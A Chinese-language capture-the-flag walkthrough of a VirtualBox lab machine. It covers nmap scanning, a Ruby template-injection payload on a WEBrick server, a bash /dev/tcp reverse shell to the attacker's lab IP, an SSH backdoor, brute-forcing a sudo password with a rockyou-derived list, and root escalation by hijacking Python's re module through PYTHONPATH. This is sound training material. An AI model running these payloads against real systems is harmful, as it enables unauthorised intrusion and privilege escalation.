所渗透的靶机IP为192.168.56.108

端口扫描

sudo nmap --min-rate 10000 -p- 192.168.56.108
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-09 13:20 UTC
Nmap scan report for 192.168.56.108 (192.168.56.108)
Host is up (0.00013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
8000/tcp open  http-alt
MAC Address: 08:00:27:28:71:8F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.68 seconds
sudo nmap -sT -sV -sC -O -p22,8000 192.168.56.108
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-09 13:20 UTC
Nmap scan report for 192.168.56.108 (192.168.56.108)
Host is up (0.00028s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 ee:71:f4:ad:a0:71:e1:35:19:86:ab:c8:e6:be:36:17 (RSA)
|   256 40:1c:c3:da:83:d7:2f:60:cb:12:47:3b:02:67:04:14 (ECDSA)
|_  256 1a:69:a7:f9:dc:a5:49:ff:d2:7d:ce:45:97:6d:8a:b9 (ED25519)
8000/tcp open  http    WEBrick httpd 1.6.1 (Ruby 2.7.4 (2021-07-07))
|_http-server-header: WEBrick/1.6.1 (Ruby/2.7.4/2021-07-07)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
MAC Address: 08:00:27:28:71:8F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.95 seconds

8000端口开了一个Webrick,一个由ruby写的Web服务器库,并且版本为1.6.1

Web(Getshell)

除了一个POST表单之外没有任何信息,也扫不到其他任何目录。搜索不到这个Webrick版本的Poc,但是有点像SSTI。于是找了ruby的SSTIpayload

#{ 7 * 7 }

发现结果是49,存在SSTI!

#{ `whoami` }

可以执行命令,做一个反弹shell

#{ `bash -c '0<&106-;exec 106<>/dev/tcp/192.168.56.102/1234;sh <&106 >&106 2>&106'` }

发现已经是一个普通用户了

做一个ssh后门

提权

sudo -l发现可以执行/opt/harness

这个脚本的大概意思就是要输入一个密码,如果正确就给新的sudo权限,但是这个密码没权限看

但是当执行一遍时会生成一个配置文件,虽然还是没有权限看,但是根据脚本:里面的内容是

$(hostname):$(whoami):$pass

也就是说是fianso:root:$password

ls -liah查看,可以得到生成的配置文件的大小为43字节,减去其他的以及一个EOF符号,那么密码的长度就为30字节。可以试着用rockyou爆破。

grep -E '^.{30}$' /usr/share/wordlists/rockyou.txt > output.txt

上传这个文本至靶机

while IFS= read -r pass; do echo -e $pass | sudo /bin/bash /opt/harness; done <output.txt

用一个循环脚本来爆破

再次sudo -l,发现可以(ALL : ALL) SETENV: NOPASSWD: /usr/bin/beet

可以在执行这个命令的时候设置环境变量

beet脚本的内容

#!/usr/bin/python3

# EASY-INSTALL-ENTRY-SCRIPT: 'beets==1.4.9','console_scripts','beet'

__requires__ = 'beets==1.4.9'
import re
import sys
from pkg_resources import load_entry_point

if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('beets==1.4.9', 'console_scripts', 'beet')()
    )

看上去似乎是用来调用beet命令的,但是由于能够设置环境变量,也就可以劫持python库了

在/tmp目录创建一个re.py

import os
os.system("/bin/bash -i")

然后执行

sudo PYTHONPATH=/tmp/ /usr/bin/beet

碎碎念

前面Getshell部分还算简单,对于ruby其实并没什么要求。后面提权部分又是对bash命令,脚本的考察。还是不错的房间